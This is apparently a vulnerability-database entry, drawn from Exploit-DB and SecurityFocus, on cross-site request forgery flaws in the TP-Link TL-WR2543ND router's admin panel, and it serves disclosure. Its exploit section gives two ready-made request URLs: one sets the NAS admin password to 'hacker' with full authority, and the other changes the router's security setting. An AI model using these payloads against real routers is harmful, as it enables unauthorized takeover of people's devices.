Sign-up

ID

VAR-E-201302-0007


EDB ID

38308


TITLE

TP-Link TL-WR2543ND Router - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 38308

DESCRIPTION

TP-Link TL-WR2543ND Router - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities.. remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 38308

AFFECTED PRODUCTS

vendor:tp linkmodel:tl-wr2543nd routerscope: - version: -

Trust: 1.0

vendor:tp linkmodel:tl-wr2543nd buildscope:eqversion:3.13.6110923

Trust: 0.3

sources: BID: 57877 // EXPLOIT-DB: 38308

EXPLOIT

source: https://www.securityfocus.com/bid/57877/info

TP-LINK TL-WR2543ND is prone to multiple cross-site request-forgery vulnerabilities because the application fails to properly validate HTTP requests.

Exploiting these issues may allow a remote attacker to change a device's configuration and perform other unauthorized actions.

TP-LINK TL-WR2543ND 3.13.6 Build 110923 is vulnerable; other versions may also be affected.

http://www.example.com/userRpm/NasUserAdvRpm.htm?nas_admin_pwd=hacker&nas_admin_confirm_pwd=hacker&nas_admin_authority=1&nas_admin_ftp=1&Modify=1&Save=Save

http://www.example.com/userRpm/BasicSecurityRpm.htm?stat=983040&Save=Save

Trust: 1.0

sources: EXPLOIT-DB: 38308

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 38308

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 38308

TYPE

Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities

Trust: 1.0

sources: EXPLOIT-DB: 38308

CREDITS

Juan Manuel Garcia

Trust: 0.6

sources: EXPLOIT-DB: 38308

EXTERNAL IDS

db:BIDid:57877

Trust: 1.9

db:EXPLOIT-DBid:38308

Trust: 1.6

db:EDBNETid:59421

Trust: 0.6

sources: BID: 57877 // EXPLOIT-DB: 38308 // EDBNET: 59421

REFERENCES

url:https://www.securityfocus.com/bid/57877/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/38308/

Trust: 0.6

url:http://www.tp-link.com/en/

Trust: 0.3

url:http://packetstorm.foofus.com/1302-exploits/tplink-xsrf.pdf

Trust: 0.3

url:http://www.tp-link.com/us/products/details/?model=tl-wr2543nd

Trust: 0.3

sources: BID: 57877 // EXPLOIT-DB: 38308 // EDBNET: 59421

SOURCES

db:BIDid:57877
db:EXPLOIT-DBid:38308
db:EDBNETid:59421

LAST UPDATE DATE

2022-07-27T09:18:57.517000+00:00


SOURCES UPDATE DATE

db:BIDid:57877date:2013-02-08T00:00:00

SOURCES RELEASE DATE

db:BIDid:57877date:2013-02-08T00:00:00
db:EXPLOIT-DBid:38308date:2013-02-08T00:00:00
db:EDBNETid:59421date:2013-02-08T00:00:00